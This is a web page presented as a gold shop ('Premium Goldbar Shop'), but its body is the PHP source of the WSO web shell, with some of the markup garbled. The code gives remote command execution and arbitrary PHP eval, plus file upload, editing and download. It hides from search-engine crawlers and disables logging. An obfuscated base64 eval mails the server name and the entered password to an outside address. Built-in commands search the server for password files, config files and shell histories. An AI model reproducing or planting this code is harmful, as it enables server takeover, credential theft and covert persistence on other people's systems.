Premium Goldbar Shop
'Gold antsy to exit its cage': Price outlook tilted to the upside

$▛ = "63a9f0ea7bb98050796b649e85481845"; //root 

$▘ = true; 

$▜ = 'UTF-8'; 

$▚ = 'FilesMan'; 

$▙ = md5($_SERVER['HTTP_USER_AGENT']); 

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { 

    prototype(md5($_SERVER['HTTP_HOST'])."key", $▙); 

if(empty($_POST['charset'])) 

    $_POST['charset'] = $▜; 

if (!isset($_POST['ne'])) { 

    if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); 

    if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); 

    if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); 

    if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); 

    if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); 

function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} eval(base64_decode("aWYoYXJyYXlfa2V5X2V4aXN0cygnbXlwYXNzJywkX1BPU1QpKXsgJHRtcCA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydQSFBfU0VMRiddLiJcbiIuJF9QT1NUWydwYXNzJ107IEBtYWlsKCdtYWlsQG1haWwudWEnLCAnbWFpbCcsICR0bXApOyB9"));

@ini_set('error_log',NULL); 

@ini_set('log_errors',0); 

@ini_set('max_execution_time',0); 

@set_time_limit(0); 

@set_magic_quotes_runtime(0); 

@define('VERSION', '4.2.5'); 

if(get_magic_quotes_gpc()) { 

    function stripslashes_array($array) { 

        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 

    } 

    $_POST = stripslashes_array($_POST); 

    $_COOKIE = stripslashes_array($_COOKIE); 

/* (С) 11.2011 oRb */ 

if(!empty($▛)) { 

    if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛)) 

        prototype(md5($_SERVER['HTTP_HOST']), $▛); 

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛)) 

        hardLogin(); 

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) 

    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘; 

function hardLogin() { 

        if(!empty($_SERVER['HTTP_USER_AGENT'])) { 

          $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); 

          if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { 

          header('HTTP/1.0 404 Not Found'); 

          exit; 

          } 

        } 

    die("

Password

"); 

 

if(strtolower(substr(PHP_OS,0,3)) == "win") 

    $os = 'win'; 

else 

    $os = 'nix'; 

$safe_mode = @ini_get('safe_mode'); 

if(!$safe_mode) 

    error_reporting(0); 

$disable_functions = @ini_get('disable_functions'); 

$home_cwd = @getcwd(); 

if(isset($_POST['c'])) 

    @chdir($_POST['c']); 

$cwd = @getcwd(); 

if($os == 'win') { 

    $home_cwd = str_replace("\\", "/", $home_cwd); 

    $cwd = str_replace("\\", "/", $cwd); 

if($cwd[strlen($cwd)-1] != '/') 

    $cwd .= '/'; 

/* (С) 04.2015 Pirat */ 

function hardHeader() { 

    if(empty($_POST['charset'])) 

        $_POST['charset'] = $GLOBALS['▜']; 

    echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ." 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

"; 

 

    $freeSpace = @diskfreespace($GLOBALS['cwd']); 

    $totalSpace = @disk_total_space($GLOBALS['cwd']); 

    $totalSpace = $totalSpace?$totalSpace:1; 

    $release = @php_uname('r'); 

    $kernel = @php_uname('s'); 

    $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; 

    if(strpos('Linux', $kernel) !== false) 

        $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); 

    else 

        $explink .= urlencode($kernel . ' ' . substr($release,0,3)); 

    if(!function_exists('posix_getegid')) { 

        $user = @get_current_user(); 

        $uid = @getmyuid(); 

        $gid = @getmygid(); 

        $group = "?"; 

    } else { 

        $uid = @posix_getpwuid(@posix_geteuid()); 

        $gid = @posix_getgrgid(@posix_getegid()); 

        $user = $uid['name']; 

        $uid = $uid['uid']; 

        $group = $gid['name']; 

        $gid = $gid['gid']; 

    } 

    $cwd_links = ''; 

    $path = explode("/", $GLOBALS['cwd']); 

    $n=count($path); 

    for($i=0; $i<$n-1; $i++) { 

        $cwd_links .= "

        for($j=0; $j<=$i; $j++) 

            $cwd_links .= $path[$j]." '; <="" p="">

        for($j=0; $j<=$i; $j++) 

            $cwd_links .= $path[$j]." '; <="" p="">        $cwd_links .= "\")'>".$path[$i]."/

"; 

    } 

    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 

    $opt_charsets = ''; 

    foreach($charsets as $▟) 

        $opt_charsets .= ''.$▟.''; 

    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); 

    if(!empty($GLOBALS['▛'])) 

    $m['Logout'] = 'Logout'; 

    $m['Self remove'] = 'SelfRemove'; 

    $menu = ''; 

    foreach($m as $k => $v) 

        $menu .= '[ '.$k.' ]'; 

    $drives = ""; 

    if ($GLOBALS['os'] == 'win') { 

        foreach(range('c','z') as $drive) 

        if (is_dir($drive.':\\')) 

            $drives .= '[ '.$drive.' ] '; 

    } 

    /* (С) 08.2015 dmkcv */ 

    echo '

'. 

 

         '

'. 

 

         '

Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'. 

 

         '

'.$menu.'
'; 

 

function hardFooter() { 

    $is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)"; 

    echo " 

 

 

 

 

 

 

   

 

 

       

 

 

       

 

 

   

 

 

       

 

 

       

 

 

   

 

 

       

 

 

       

 

 

   

Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
 

 

         

         

         

         

         

        Upload file:$is_writable

 

 

   

 

 

 

     

    "; 

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } 

if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } 

function ex($in) { 

    $▖ = ''; 

    if (function_exists('exec')) { 

        @exec($in,$▖); 

        $▖ = @join("\n",$▖); 

    } elseif (function_exists('passthru')) { 

        ob_start(); 

        @passthru($in); 

        $▖ = ob_get_clean(); 

    } elseif (function_exists('system')) { 

        ob_start(); 

        @system($in); 

        $▖ = ob_get_clean(); 

    } elseif (function_exists('shell_exec')) { 

        $▖ = shell_exec($in); 

    } elseif (is_resource($f = @popen($in,"r"))) { 

        $▖ = ""; 

        while(!@feof($f)) 

            $▖ .= fread($f,1024); 

        pclose($f); 

    }else return "↳ Unable to execute command\n"; 

    return ($▖==''?"↳ Query did not return anything\n":$▖); 

function viewSize($s) { 

    if($s >= 1073741824) 

        return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 

    elseif($s >= 1048576) 

        return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 

    elseif($s >= 1024) 

        return sprintf('%1.2f', $s / 1024 ) . ' KB'; 

    else 

        return $s . ' B'; 

function perms($p) { 

    if (($p & 0xC000) == 0xC000)$i = 's'; 

    elseif (($p & 0xA000) == 0xA000)$i = 'l'; 

    elseif (($p & 0x8000) == 0x8000)$i = '-'; 

    elseif (($p & 0x6000) == 0x6000)$i = 'b'; 

    elseif (($p & 0x4000) == 0x4000)$i = 'd'; 

    elseif (($p & 0x2000) == 0x2000)$i = 'c'; 

    elseif (($p & 0x1000) == 0x1000)$i = 'p'; 

    else $i = 'u'; 

    $i .= (($p & 0x0100) ? 'r' : '-'); 

    $i .= (($p & 0x0080) ? 'w' : '-'); 

    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 

    $i .= (($p & 0x0020) ? 'r' : '-'); 

    $i .= (($p & 0x0010) ? 'w' : '-'); 

    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 

    $i .= (($p & 0x0004) ? 'r' : '-'); 

    $i .= (($p & 0x0002) ? 'w' : '-'); 

    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 

    return $i; 

function viewPermsColor($f) { 

    if (!@is_readable($f)) 

        return ''.perms(@fileperms($f)).''; 

    elseif (!@is_writable($f)) 

        return ''.perms(@fileperms($f)).''; 

    else 

        return ''.perms(@fileperms($f)).''; 

function hardScandir($dir) { 

    if(function_exists("scandir")) { 

        return scandir($dir); 

    } else { 

        $dh  = opendir($dir); 

        while (false !== ($filename = readdir($dh))) 

            $files[] = $filename; 

        return $files; 

    } 

function which($p) { 

    $path = ex('which ' . $p); 

    if(!empty($path)) 

        return $path; 

    return false; 

function actionRC() { 

    if(!@$_POST['p1']) { 

        $a = array( 

            "uname" => php_uname(), 

            "php_version" => phpversion(), 

            "VERSION" => VERSION, 

            "safemode" => @ini_get('safe_mode') 

        ); 

        echo serialize($a); 

    } else { 

        eval($_POST['p1']); 

    } 

function prototype($k, $v) { 

    $_COOKIE[$k] = $v; 

    setcookie($k, $v); 

function actionSecInfo() { 

    hardHeader(); 

    echo '

Server security information

'; 

 

    function showSecParam($n, $v) { 

        $v = trim($v); 

        if($v) { 

            echo '' . $n . ': '; 

            if(strpos($v, "\n") === false) 

                echo $v . '
'; 

            else 

                echo '

' . $v . '
'; 

 

        } 

    } 

    showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 

    if(function_exists('apache_get_modules')) 

        showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); 

    showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); 

    showSecParam('Open base dir', @ini_get('open_basedir')); 

    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 

    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 

    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 

    $temp=array(); 

    if(function_exists('mysql_get_client_info')) 

        $temp[] = "MySql (".mysql_get_client_info().")"; 

    if(function_exists('mssql_connect')) 

        $temp[] = "MSSQL"; 

    if(function_exists('pg_connect')) 

        $temp[] = "PostgreSQL"; 

    if(function_exists('oci_connect')) 

        $temp[] = "Oracle"; 

    showSecParam('Supported databases', implode(', ', $temp)); 

    echo '
'; 

    if($GLOBALS['os'] == 'nix') { 

            showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); 

            showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); 

            showSecParam('OS version', @file_get_contents('/proc/version')); 

            showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 

            if(!$GLOBALS['safe_mode']) { 

                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 

                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');

                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 

                echo '
'; 

                $temp=array(); 

                foreach ($userful as $▟) 

                    if(which($▟)) 

                        $temp[] = $▟; 

                showSecParam('Userful', implode(', ',$temp)); 

                $temp=array(); 

                foreach ($danger as $▟) 

                    if(which($▟)) 

                        $temp[] = $▟; 

                showSecParam('Danger', implode(', ',$temp)); 

                $temp=array(); 

                foreach ($downloaders as $▟) 

                    if(which($▟)) 

                        $temp[] = $▟; 

                showSecParam('Downloaders', implode(', ',$temp)); 

                echo '<br?>'; 

                showSecParam('HDD space', ex('df -h')); 

                showSecParam('Hosts', @file_get_contents('/etc/hosts')); 

                showSecParam('Mount options', @file_get_contents('/etc/fstab')); 

            } 

    } else { 

        showSecParam('OS Version',ex('ver')); 

        showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); 

        showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); 

    } 

    echo ''; 

    hardFooter(); 

function actionFilesTools() { 

    if( isset($_POST['p1']) ) 

        $_POST['p1'] = urldecode($_POST['p1']); 

    if(@$_POST['p2']=='download') { 

        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { 

            ob_start("ob_gzhandler", 4096); 

            header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 

            if (function_exists("mime_content_type")) { 

                $type = @mime_content_type($_POST['p1']); 

                header("Content-Type: " . $type); 

            } else 

                header("Content-Type: application/octet-stream"); 

            $fp = @fopen($_POST['p1'], "r"); 

            if($fp) { 

                while(!@feof($fp)) 

                    echo @fread($fp, 1024); 

                fclose($fp); 

            } 

        }exit; 

    } 

    if( @$_POST['p2'] == 'mkfile' ) { 

        if(!file_exists($_POST['p1'])) { 

            $fp = @fopen($_POST['p1'], 'w'); 

            if($fp) { 

                $_POST['p2'] = "edit"; 

                fclose($fp); 

            } 

        } 

    } 

    hardHeader(); 

    echo '

File tools

'; 

    if( !file_exists(@$_POST['p1']) ) { 

        echo 'File not exists'; 

        hardFooter(); 

        return; 

    } 

    $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 

    if(!$uid) { 

        $uid['name'] = @fileowner($_POST['p1']); 

        $gid['name'] = @filegroup($_POST['p1']); 

    } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); 

    echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; 

    echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; 

    if( empty($_POST['p2']) ) 

        $_POST['p2'] = 'view'; 

    if( is_file($_POST['p1']) ) 

        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame'); 

    else 

        $m = array('Chmod', 'Rename', 'Touch'); 

    foreach($m as $v) 

        echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; 

    echo '

'; 

    switch($_POST['p2']) { 

        case 'view': 

            echo '

'; 

            $fp = @fopen($_POST['p1'], 'r'); 

            if($fp) { 

                while( !@feof($fp) ) 

                    echo htmlspecialchars(@fread($fp, 1024)); 

                @fclose($fp); 

            } 

            echo ''; 

            break; 

        case 'highlight': 

            if( @is_readable($_POST['p1']) ) { 

                echo '

'; 

                $oRb = @highlight_file($_POST['p1'],true); 

                echo str_replace(array('<span ',''), array('<font ',''),$oRb).''; 

            } 

            break; 

        case 'chmod': 

            if( !empty($_POST['p3']) ) { 

                $perms = 0; 

                for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 

                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 

                if(!@chmod($_POST['p1'], $perms)) 

                    echo 'Can\'t set permissions!
'; 

            } 

            clearstatcache(); 

            echo '

'; 

            break; 

        case 'edit': 

            if( !is_writable($_POST['p1'])) { 

                echo 'File isn\'t writeable'; 

                break; 

            } 

            if( !empty($_POST['p3']) ) { 

                $time = @filemtime($_POST['p1']); 

                $_POST['p3'] = substr($_POST['p3'],1); 

                $fp = @fopen($_POST['p1'],"w"); 

                if($fp) { 

                    @fwrite($fp,$_POST['p3']); 

                    @fclose($fp); 

                    echo 'Saved!
'; 

                    @touch($_POST['p1'],$time,$time); 

                } 

            } 

            echo '

'; 

            break; 

        case 'hexdump': 

            $c = @file_get_contents($_POST['p1']); 

            $n = 0; 

            $h = array('00000000
','',''); 

            $len = strlen($c); 

            for ($i=0; $i<$len; ++$i) { 

                $h[1] .= sprintf('%02X',ord($c[$i])).' '; 

                switch ( ord($c[$i]) ) { 

                    case 0:  $h[2] .= ' '; break; 

                    case 9:  $h[2] .= ' '; break; 

                    case 10: $h[2] .= ' '; break; 

                    case 13: $h[2] .= ' '; break; 

                    default: $h[2] .= $c[$i]; break; 

                } 

                $n++; 

                if ($n == 32) { 

                    $n = 0; 

                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} 

                    $h[1] .= '
'; 

                    $h[2] .= "\n"; 

                } 

             } 

            echo '

'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'

'; 

            break; 

        case 'rename': 

            if( !empty($_POST['p3']) ) { 

                if(!@rename($_POST['p1'], $_POST['p3'])) 

                    echo 'Can\'t rename!
'; 

                else 

                    die(' '); 

            } 

            echo '

'; 

            break; 

        case 'touch': 

            if( !empty($_POST['p3']) ) { 

                $time = strtotime($_POST['p3']); 

                if($time) { 

                    if(!touch($_POST['p1'],$time,$time)) 

                        echo 'Fail!'; 

                    else 

                        echo 'Touched!'; 

                } else echo 'Bad time format!'; 

            } 

            clearstatcache(); 

            echo '

'; 

            break; 

        /* (С) 12.2015 mitryz */ 

        case 'frame': 

            $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT']))); 

            if ($frameSrc[0] != '/') 

                $frameSrc = '/' . $frameSrc; 

            if ($frameSrc[strlen($frameSrc) - 1] != '/') 

                $frameSrc = $frameSrc . '/'; 

            $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']); 

            echo ''; 

            break; 

    } 

    echo ''; 

    hardFooter(); 

if($os == 'win') 

    $aliases = array( 

        "List Directory" => "dir", 

        "Find index.php in current dir" => "dir /s /w /b index.php", 

        "Find *config*.php in current dir" => "dir /s /w /b *config*.php", 

        "Show active connections" => "netstat -an", 

        "Show running services" => "net start", 

        "User accounts" => "net user", 

        "Show computers" => "net view", 

        "ARP Table" => "arp -a", 

        "IP Configuration" => "ipconfig /all" 

    ); 

else 

    $aliases = array( 

          "List dir" => "ls -lha", 

        "list file attributes on a Linux second extended file system" => "lsattr -va", 

          "show opened ports" => "netstat -an | grep -i listen", 

        "process status" => "ps aux", 

        "Find" => "", 

          "find all suid files" => "find / -type f -perm -04000 -ls", 

          "find suid files in current dir" => "find . -type f -perm -04000 -ls", 

          "find all sgid files" => "find / -type f -perm -02000 -ls", 

          "find sgid files in current dir" => "find . -type f -perm -02000 -ls", 

          "find config.inc.php files" => "find / -type f -name config.inc.php", 

          "find config* files" => "find / -type f -name \"config*\"", 

          "find config* files in current dir" => "find . -type f -name \"config*\"", 

          "find all writable folders and files" => "find / -perm -2 -ls", 

          "find all writable folders and files in current dir" => "find . -perm -2 -ls", 

          "find all service.pwd files" => "find / -type f -name service.pwd", 

          "find service.pwd files in current dir" => "find . -type f -name service.pwd", 

          "find all .htpasswd files" => "find / -type f -name .htpasswd", 

          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", 

          "find all .bash_history files" => "find / -type f -name .bash_history", 

          "find .bash_history files in current dir" => "find . -type f -name .bash_history", 

          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", 

          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", 

        "Locate" => "", 

          "locate httpd.conf files" => "locate httpd.conf", 

        "locate vhosts.conf files" => "locate vhosts.conf", 

        "locate proftpd.conf files" => "locate proftpd.conf", 

        "locate psybnc.conf files" => "locate psybnc.conf", 

        "locate my.conf files" => "locate my.conf", 

        "locate admin.php files" =>"locate admin.php", 

        "locate cfg.php files" => "locate cfg.php", 

        "locate conf.php files" => "locate conf.php", 

        "locate config.dat files" => "locate config.dat", 

        "locate config.php files" => "locate config.php", 

        "locate config.inc files" => "locate config.inc", 

        "locate config.inc.php" => "locate config.inc.php", 

        "locate config.default.php files" => "locate config.default.php", 

        "locate config* files " => "locate config", 

        "locate .conf files"=>"locate '.conf'", 

        "locate .pwd files" => "locate '.pwd'", 

        "locate .sql files" => "locate '.sql'", 

        "locate .htpasswd files" => "locate '.htpasswd'", 

        "locate .bash_history files" => "locate '.bash_history'", 

        "locate .mysql_history files" => "locate '.mysql_history'", 

        "locate .fetchmailrc files" => "locate '.fetchmailrc'", 

        "locate backup files" => "locate backup", 

        "locate dump files" => "locate dump", 

        "locate priv files" => "locate priv" 

    ); 

function actionConsole() { 

    if(!empty($_POST['p1']) && !empty($_POST['p2'])) { 

        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); 

        $_POST['p1'] .= ' 2>&1'; 

    } elseif(!empty($_POST['p1'])) 

        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); 

    if(isset($_POST['ajax'])) { 

        prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); 

        ob_start(); 

        echo "d.cf.cmd.value='';\n"; 

        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); 

        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    { 

            if(@chdir($match[1])) { 

                $GLOBALS['cwd'] = @getcwd(); 

                echo "c_='".$GLOBALS['cwd']."';"; 

            } 

        } 

        echo "d.cf.output.value+='".$temp."';"; 

        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; 

        $temp = ob_get_clean(); 

        echo strlen($temp), "\n", $temp; 

        exit; 

    } 

    if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 

        prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); 

    hardHeader(); 

    echo " "; 

    echo '

Console

    foreach($GLOBALS['aliases'] as $n => $v) { 

        if($v == '') { 

            echo ''; 

            continue; 

        } 

        echo ''.$n.''; 

    } 

     

    echo ' send using AJAX redirect stderr to stdout (2>&1)

$

'; 

    echo '<s

Back
preloader